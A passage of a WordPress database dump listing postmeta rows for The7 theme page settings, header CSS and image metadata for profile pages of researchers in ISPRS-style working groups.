(19226,3041,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(19227,3043,'_edit_lock','1668879378:1'),
(19228,3044,'_wp_attached_file','2022/11/wss207.jpg'),
(19229,3044,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:134;s:6:\"height\";i:160;s:4:\"file\";s:18:\"2022/11/wss207.jpg\";s:8:\"filesize\";i:30387;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"wss207-134x150.jpg\";s:5:\"width\";i:134;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4828;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(19230,3043,'_thumbnail_id','3044'),
(19231,3043,'_edit_last','1'),
(19232,3043,'_dt_sidebar_position','disabled'),
(19233,3043,'_dt_sidebar_widgetarea_id','sidebar_1'),
(19234,3043,'_dt_sidebar_hide_on_mobile','0'),
(19235,3043,'_dt_footer_show','1'),
(19236,3043,'_dt_footer_widgetarea_id','sidebar_2'),
(19237,3043,'_dt_footer_hide_on_mobile','0'),
(19238,3043,'_dt_header_title','fancy'),
(19239,3043,'_dt_header_background','normal'),
(19240,3043,'_dt_header_background_below_slideshow','disabled'),
(19241,3043,'_dt_header_transparent_bg_color_scheme','light'),
(19242,3043,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(19243,3043,'_dt_header_transparent_top_bar_bg_opacity','25'),
(19244,3043,'_dt_header_transparent_bg_color','#000000'),
(19245,3043,'_dt_header_transparent_bg_opacity','50'),
(19246,3043,'_dt_header_disabled_background','normal'),
(19247,3043,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(19248,3043,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(19249,3043,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(19250,3043,'_dt_header_disabled_transparent_bg_color','#000000'),
(19251,3043,'_dt_header_disabled_transparent_bg_opacity','50'),
(19252,3043,'_dt_page_overrides_top_margin',''),
(19253,3043,'_dt_page_overrides_right_margin',''),
(19254,3043,'_dt_page_overrides_bottom_margin',''),
(19255,3043,'_dt_page_overrides_left_margin',''),
(19256,3043,'_dt_mobile_page_padding_top',''),
(19257,3043,'_dt_mobile_page_padding_right',''),
(19258,3043,'_dt_mobile_page_padding_bottom',''),
(19259,3043,'_dt_mobile_page_padding_left',''),
(19260,3043,'_dt_fancy_header_layout_heading',''),
(19261,3043,'_dt_fancy_header_title_aligment','center'),
(19262,3043,'_dt_fancy_header_height','300'),
(19263,3043,'_dt_fancy_header_padding-top','0px'),
(19264,3043,'_dt_fancy_header_padding-bottom','0px'),
(19265,3043,'_dt_fancy_header_breadcrumbs_heading',''),
(19266,3043,'_dt_fancy_header_breadcrumbs','disabled'),
(19267,3043,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(19268,3043,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(19269,3043,'_dt_fancy_header_title_heading',''),
(19270,3043,'_dt_fancy_header_title_mode','custom'),
(19271,3043,'_dt_fancy_header_title','Mariana Campos Finnish Geospatial Research Institute, Finland (WGI-7)'),
(19272,3043,'_dt_fancy_header_title_font_size','30'),
(19273,3043,'_dt_fancy_header_title_line_height','36'),
(19274,3043,'_dt_fancy_header_text_transform','none'),
(19275,3043,'_dt_fancy_header_title_color_mode','color'),
(19276,3043,'_dt_fancy_header_title_color','#ffffff'),
(19277,3043,'_dt_fancy_header_subtitle_heading',''),
(19278,3043,'_dt_fancy_header_subtitle',''),
(19279,3043,'_dt_fancy_header_subtitle_font_size','18'),
(19280,3043,'_dt_fancy_header_subtitle_line_height','26'),
(19281,3043,'_dt_fancy_header_subtitle_text_transform','none'),
(19282,3043,'_dt_fancy_header_subtitle_color_mode','color'),
(19283,3043,'_dt_fancy_header_subtitle_color','#ffffff'),
(19284,3043,'_dt_fancy_header_bg_heading',''),
(19285,3043,'_dt_fancy_header_bg_color','#222222'),
(19286,3043,'_dt_fancy_header_bg_image_origin','custom'),
(19287,3043,'_dt_fancy_header_bg_image','a:0:{}'),
(19288,3043,'_dt_fancy_header_bg_repeat','no-repeat'),
(19289,3043,'_dt_fancy_header_bg_position_x','center'),
(19290,3043,'_dt_fancy_header_bg_position_y','center'),
(19291,3043,'_dt_fancy_header_bg_fullscreen','1'),
(19292,3043,'_dt_fancy_header_bg_overlay','0'),
(19293,3043,'_dt_fancy_header_overlay_color','#000'),
(19294,3043,'_dt_fancy_header_bg_overlay_opacity','50'),
(19295,3043,'_dt_fancy_header_scroll_effect','default'),
(19296,3043,'_dt_fancy_header_bg_parallax','0.5'),
(19297,3043,'_dt_fancy_header_responsiveness_heading',''),
(19298,3043,'_dt_fancy_header_responsiveness','enabled'),
(19299,3043,'_dt_fancy_header_responsiveness_switch','778px'),
(19300,3043,'_dt_fancy_header_responsive_height','70'),
(19301,3043,'_dt_fancy_header_responsive_font_size','30'),
(19302,3043,'_dt_fancy_header_responsive_title_line_height','38'),
(19303,3043,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(19304,3043,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(19305,3043,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(19306,3043,'_dt_teammate_options_go_to_single','1'),
(19307,3043,'_dt_teammate_options_position',''),
(19308,3043,'_dt_teammate_options_website',''),
(19309,3043,'_dt_teammate_options_mail',''),
(19310,3043,'_dt_teammate_options_facebook',''),
(19311,3043,'_dt_teammate_options_twitter',''),
(19312,3043,'_dt_teammate_options_dribbble',''),
(19313,3043,'_dt_teammate_options_you-tube',''),
(19314,3043,'_dt_teammate_options_rss',''),
(19315,3043,'_dt_teammate_options_delicious',''),
(19316,3043,'_dt_teammate_options_flickr',''),
(19317,3043,'_dt_teammate_options_lastfm',''),
(19318,3043,'_dt_teammate_options_linkedin',''),
(19319,3043,'_dt_teammate_options_vimeo',''),
(19320,3043,'_dt_teammate_options_tumbler',''),
(19321,3043,'_dt_teammate_options_pinterest',''),
(19322,3043,'_dt_teammate_options_devian',''),
(19323,3043,'_dt_teammate_options_skype',''),
(19324,3043,'_dt_teammate_options_github',''),
(19325,3043,'_dt_teammate_options_instagram',''),
(19326,3043,'_dt_teammate_options_stumbleupon',''),
(19327,3043,'_dt_teammate_options_behance',''),
(19328,3043,'_dt_teammate_options_px-500',''),
(19329,3043,'_dt_teammate_options_tripedvisor',''),
(19330,3043,'_dt_teammate_options_vk',''),
(19331,3043,'_dt_teammate_options_foursquare',''),
(19332,3043,'_dt_teammate_options_xing',''),
(19333,3043,'_dt_teammate_options_weibo',''),
(19334,3043,'_dt_teammate_options_odnoklassniki',''),
(19335,3043,'_dt_teammate_options_research-gate',''),
(19336,3043,'_dt_teammate_options_yelp',''),
(19337,3043,'_dt_teammate_options_blogger',''),
(19338,3043,'_dt_teammate_options_soundcloud',''),
(19339,3043,'_dt_teammate_options_viber',''),
(19340,3043,'_dt_teammate_options_whatsapp',''),
(19341,3043,'_dt_teammate_options_reddit',''),
(19342,3043,'_dt_teammate_options_snapchat',''),
(19343,3043,'_dt_teammate_options_telegram',''),
(19344,3043,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(19345,3045,'_edit_lock','1667935706:1'),
(19346,3046,'_wp_attached_file','2022/11/wss208.jpg'),
(19347,3046,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:133;s:6:\"height\";i:160;s:4:\"file\";s:18:\"2022/11/wss208.jpg\";s:8:\"filesize\";i:32463;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"wss208-133x150.jpg\";s:5:\"width\";i:133;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4724;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(19348,3045,'_thumbnail_id','3046'),
(19349,3045,'_edit_last','1'),
(19350,3045,'_dt_sidebar_position','disabled'),
(19351,3045,'_dt_sidebar_widgetarea_id','sidebar_1'),
(19352,3045,'_dt_sidebar_hide_on_mobile','0'),
(19353,3045,'_dt_footer_show','1'),
(19354,3045,'_dt_footer_widgetarea_id','sidebar_2'),
(19355,3045,'_dt_footer_hide_on_mobile','0');
INSERT INTO `dnctiavkr_postmeta` VALUES
(19356,3045,'_dt_header_title','fancy'),
(19357,3045,'_dt_header_background','normal'),
(19358,3045,'_dt_header_background_below_slideshow','disabled'),
(19359,3045,'_dt_header_transparent_bg_color_scheme','light'),
(19360,3045,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(19361,3045,'_dt_header_transparent_top_bar_bg_opacity','25'),
(19362,3045,'_dt_header_transparent_bg_color','#000000'),
(19363,3045,'_dt_header_transparent_bg_opacity','50'),
(19364,3045,'_dt_header_disabled_background','normal'),
(19365,3045,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(19366,3045,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(19367,3045,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(19368,3045,'_dt_header_disabled_transparent_bg_color','#000000'),
(19369,3045,'_dt_header_disabled_transparent_bg_opacity','50'),
(19370,3045,'_dt_page_overrides_top_margin',''),
(19371,3045,'_dt_page_overrides_right_margin',''),
(19372,3045,'_dt_page_overrides_bottom_margin',''),
(19373,3045,'_dt_page_overrides_left_margin',''),
(19374,3045,'_dt_mobile_page_padding_top',''),
(19375,3045,'_dt_mobile_page_padding_right',''),
(19376,3045,'_dt_mobile_page_padding_bottom',''),
(19377,3045,'_dt_mobile_page_padding_left',''),
(19378,3045,'_dt_fancy_header_layout_heading',''),
(19379,3045,'_dt_fancy_header_title_aligment','center'),
(19380,3045,'_dt_fancy_header_height','300'),
(19381,3045,'_dt_fancy_header_padding-top','0px'),
(19382,3045,'_dt_fancy_header_padding-bottom','0px'),
(19383,3045,'_dt_fancy_header_breadcrumbs_heading',''),
(19384,3045,'_dt_fancy_header_breadcrumbs','disabled'),
(19385,3045,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(19386,3045,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(19387,3045,'_dt_fancy_header_title_heading',''),
(19388,3045,'_dt_fancy_header_title_mode','custom'),
(19389,3045,'_dt_fancy_header_title','Martin Mokroš, Czech University of Life Sciences Prague, Czech Republic (WGIII-1)'),
(19390,3045,'_dt_fancy_header_title_font_size','30'),
(19391,3045,'_dt_fancy_header_title_line_height','36'),
(19392,3045,'_dt_fancy_header_text_transform','none'),
(19393,3045,'_dt_fancy_header_title_color_mode','color'),
(19394,3045,'_dt_fancy_header_title_color','#ffffff'),
(19395,3045,'_dt_fancy_header_subtitle_heading',''),
(19396,3045,'_dt_fancy_header_subtitle',''),
(19397,3045,'_dt_fancy_header_subtitle_font_size','18'),
(19398,3045,'_dt_fancy_header_subtitle_line_height','26'),
(19399,3045,'_dt_fancy_header_subtitle_text_transform','none'),
(19400,3045,'_dt_fancy_header_subtitle_color_mode','color'),
(19401,3045,'_dt_fancy_header_subtitle_color','#ffffff'),
(19402,3045,'_dt_fancy_header_bg_heading',''),
(19403,3045,'_dt_fancy_header_bg_color','#222222'),
(19404,3045,'_dt_fancy_header_bg_image_origin','custom'),
(19405,3045,'_dt_fancy_header_bg_image','a:0:{}'),
(19406,3045,'_dt_fancy_header_bg_repeat','no-repeat'),
(19407,3045,'_dt_fancy_header_bg_position_x','center'),
(19408,3045,'_dt_fancy_header_bg_position_y','center'),
(19409,3045,'_dt_fancy_header_bg_fullscreen','1'),
(19410,3045,'_dt_fancy_header_bg_overlay','0'),
(19411,3045,'_dt_fancy_header_overlay_color','#000'),
(19412,3045,'_dt_fancy_header_bg_overlay_opacity','50'),
(19413,3045,'_dt_fancy_header_scroll_effect','default'),
(19414,3045,'_dt_fancy_header_bg_parallax','0.5'),
(19415,3045,'_dt_fancy_header_responsiveness_heading',''),
(19416,3045,'_dt_fancy_header_responsiveness','enabled'),
(19417,3045,'_dt_fancy_header_responsiveness_switch','778px'),
(19418,3045,'_dt_fancy_header_responsive_height','70'),
(19419,3045,'_dt_fancy_header_responsive_font_size','30'),
(19420,3045,'_dt_fancy_header_responsive_title_line_height','38'),
(19421,3045,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(19422,3045,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(19423,3045,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(19424,3045,'_dt_teammate_options_go_to_single','1'),
(19425,3045,'_dt_teammate_options_position',''),
(19426,3045,'_dt_teammate_options_website',''),
(19427,3045,'_dt_teammate_options_mail',''),
(19428,3045,'_dt_teammate_options_facebook',''),
(19429,3045,'_dt_teammate_options_twitter',''),
(19430,3045,'_dt_teammate_options_dribbble',''),
(19431,3045,'_dt_teammate_options_you-tube',''),
(19432,3045,'_dt_teammate_options_rss',''),
(19433,3045,'_dt_teammate_options_delicious',''),
(19434,3045,'_dt_teammate_options_flickr',''),
(19435,3045,'_dt_teammate_options_lastfm',''),
(19436,3045,'_dt_teammate_options_linkedin',''),
(19437,3045,'_dt_teammate_options_vimeo',''),
(19438,3045,'_dt_teammate_options_tumbler',''),
(19439,3045,'_dt_teammate_options_pinterest',''),
(19440,3045,'_dt_teammate_options_devian',''),
(19441,3045,'_dt_teammate_options_skype',''),
(19442,3045,'_dt_teammate_options_github',''),
(19443,3045,'_dt_teammate_options_instagram',''),
(19444,3045,'_dt_teammate_options_stumbleupon',''),
(19445,3045,'_dt_teammate_options_behance',''),
(19446,3045,'_dt_teammate_options_px-500',''),
(19447,3045,'_dt_teammate_options_tripedvisor',''),
(19448,3045,'_dt_teammate_options_vk',''),
(19449,3045,'_dt_teammate_options_foursquare',''),
(19450,3045,'_dt_teammate_options_xing',''),
(19451,3045,'_dt_teammate_options_weibo',''),
(19452,3045,'_dt_teammate_options_odnoklassniki',''),
(19453,3045,'_dt_teammate_options_research-gate',''),
(19454,3045,'_dt_teammate_options_yelp',''),
(19455,3045,'_dt_teammate_options_blogger',''),
(19456,3045,'_dt_teammate_options_soundcloud',''),
(19457,3045,'_dt_teammate_options_viber',''),
(19458,3045,'_dt_teammate_options_whatsapp',''),
(19459,3045,'_dt_teammate_options_reddit',''),
(19460,3045,'_dt_teammate_options_snapchat',''),
(19461,3045,'_dt_teammate_options_telegram',''),
(19462,3045,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(19463,3047,'_edit_lock','1667936342:1'),
(19464,3048,'_wp_attached_file','2022/11/wss209.jpg'),
(19465,3048,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:131;s:6:\"height\";i:161;s:4:\"file\";s:18:\"2022/11/wss209.jpg\";s:8:\"filesize\";i:32903;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"wss209-131x150.jpg\";s:5:\"width\";i:131;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4640;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(19466,3047,'_thumbnail_id','3048'),
(19467,3047,'_edit_last','1'),
(19468,3047,'_dt_sidebar_position','right'),
(19469,3047,'_dt_sidebar_widgetarea_id','sidebar_1'),
(19470,3047,'_dt_sidebar_hide_on_mobile','0'),
(19471,3047,'_dt_footer_show','1'),
(19472,3047,'_dt_footer_widgetarea_id','sidebar_2'),
(19473,3047,'_dt_footer_hide_on_mobile','0'),
(19474,3047,'_dt_header_title','fancy'),
(19475,3047,'_dt_header_background','normal'),
(19476,3047,'_dt_header_background_below_slideshow','disabled'),
(19477,3047,'_dt_header_transparent_bg_color_scheme','light'),
(19478,3047,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(19479,3047,'_dt_header_transparent_top_bar_bg_opacity','25'),
(19480,3047,'_dt_header_transparent_bg_color','#000000'),
(19481,3047,'_dt_header_transparent_bg_opacity','50'),
(19482,3047,'_dt_header_disabled_background','normal'),
(19483,3047,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(19484,3047,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(19485,3047,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(19486,3047,'_dt_header_disabled_transparent_bg_color','#000000'),
(19487,3047,'_dt_header_disabled_transparent_bg_opacity','50'),
(19488,3047,'_dt_page_overrides_top_margin',''),
(19489,3047,'_dt_page_overrides_right_margin',''),
(19490,3047,'_dt_page_overrides_bottom_margin',''),
(19491,3047,'_dt_page_overrides_left_margin',''),
(19492,3047,'_dt_mobile_page_padding_top',''),
(19493,3047,'_dt_mobile_page_padding_right',''),
(19494,3047,'_dt_mobile_page_padding_bottom',''),
(19495,3047,'_dt_mobile_page_padding_left',''),
(19496,3047,'_dt_fancy_header_layout_heading',''),
(19497,3047,'_dt_fancy_header_title_aligment','center'),
(19498,3047,'_dt_fancy_header_height','300'),
(19499,3047,'_dt_fancy_header_padding-top','0px'),
(19500,3047,'_dt_fancy_header_padding-bottom','0px'),
(19501,3047,'_dt_fancy_header_breadcrumbs_heading',''),
(19502,3047,'_dt_fancy_header_breadcrumbs','disabled'),
(19503,3047,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(19504,3047,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(19505,3047,'_dt_fancy_header_title_heading',''),
(19506,3047,'_dt_fancy_header_title_mode','custom'),
(19507,3047,'_dt_fancy_header_title','Roberto Pierdicca Polytechnic University of Marche, Italy (WGIII-8)'),
(19508,3047,'_dt_fancy_header_title_font_size','30'),
(19509,3047,'_dt_fancy_header_title_line_height','36'),
(19510,3047,'_dt_fancy_header_text_transform','none'),
(19511,3047,'_dt_fancy_header_title_color_mode','color'),
(19512,3047,'_dt_fancy_header_title_color','#ffffff'),
(19513,3047,'_dt_fancy_header_subtitle_heading',''),
(19514,3047,'_dt_fancy_header_subtitle',''),
(19515,3047,'_dt_fancy_header_subtitle_font_size','18'),
(19516,3047,'_dt_fancy_header_subtitle_line_height','26'),
(19517,3047,'_dt_fancy_header_subtitle_text_transform','none'),
(19518,3047,'_dt_fancy_header_subtitle_color_mode','color'),
(19519,3047,'_dt_fancy_header_subtitle_color','#ffffff'),
(19520,3047,'_dt_fancy_header_bg_heading',''),
(19521,3047,'_dt_fancy_header_bg_color','#222222'),
(19522,3047,'_dt_fancy_header_bg_image_origin','custom'),
(19523,3047,'_dt_fancy_header_bg_image','a:0:{}'),
(19524,3047,'_dt_fancy_header_bg_repeat','no-repeat'),
(19525,3047,'_dt_fancy_header_bg_position_x','center'),
(19526,3047,'_dt_fancy_header_bg_position_y','center'),
(19527,3047,'_dt_fancy_header_bg_fullscreen','1'),
(19528,3047,'_dt_fancy_header_bg_overlay','0'),
(19529,3047,'_dt_fancy_header_overlay_color','#000'),
(19530,3047,'_dt_fancy_header_bg_overlay_opacity','50'),
(19531,3047,'_dt_fancy_header_scroll_effect','default'),
(19532,3047,'_dt_fancy_header_bg_parallax','0.5'),
(19533,3047,'_dt_fancy_header_responsiveness_heading',''),
(19534,3047,'_dt_fancy_header_responsiveness','enabled'),
(19535,3047,'_dt_fancy_header_responsiveness_switch','778px'),
(19536,3047,'_dt_fancy_header_responsive_height','70'),
(19537,3047,'_dt_fancy_header_responsive_font_size','30'),
(19538,3047,'_dt_fancy_header_responsive_title_line_height','38'),
(19539,3047,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(19540,3047,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(19541,3047,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(19542,3047,'_dt_teammate_options_go_to_single','1'),
(19543,3047,'_dt_teammate_options_position',''),
(19544,3047,'_dt_teammate_options_website',''),
(19545,3047,'_dt_teammate_options_mail',''),
(19546,3047,'_dt_teammate_options_facebook',''),
(19547,3047,'_dt_teammate_options_twitter',''),
(19548,3047,'_dt_teammate_options_dribbble',''),
(19549,3047,'_dt_teammate_options_you-tube',''),
(19550,3047,'_dt_teammate_options_rss',''),
(19551,3047,'_dt_teammate_options_delicious',''),
(19552,3047,'_dt_teammate_options_flickr',''),
(19553,3047,'_dt_teammate_options_lastfm',''),
(19554,3047,'_dt_teammate_options_linkedin',''),
(19555,3047,'_dt_teammate_options_vimeo',''),
(19556,3047,'_dt_teammate_options_tumbler',''),
(19557,3047,'_dt_teammate_options_pinterest',''),
(19558,3047,'_dt_teammate_options_devian',''),
(19559,3047,'_dt_teammate_options_skype',''),
(19560,3047,'_dt_teammate_options_github',''),
(19561,3047,'_dt_teammate_options_instagram',''),
(19562,3047,'_dt_teammate_options_stumbleupon',''),
(19563,3047,'_dt_teammate_options_behance',''),
(19564,3047,'_dt_teammate_options_px-500',''),
(19565,3047,'_dt_teammate_options_tripedvisor',''),
(19566,3047,'_dt_teammate_options_vk',''),
(19567,3047,'_dt_teammate_options_foursquare',''),
(19568,3047,'_dt_teammate_options_xing',''),
(19569,3047,'_dt_teammate_options_weibo',''),
(19570,3047,'_dt_teammate_options_odnoklassniki',''),
(19571,3047,'_dt_teammate_options_research-gate',''),
(19572,3047,'_dt_teammate_options_yelp',''),
(19573,3047,'_dt_teammate_options_blogger',''),
(19574,3047,'_dt_teammate_options_soundcloud',''),
(19575,3047,'_dt_teammate_options_viber',''),
(19576,3047,'_dt_teammate_options_whatsapp',''),
(19577,3047,'_dt_teammate_options_reddit',''),
(19578,3047,'_dt_teammate_options_snapchat',''),
(19579,3047,'_dt_teammate_options_telegram',''),
(19580,3047,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  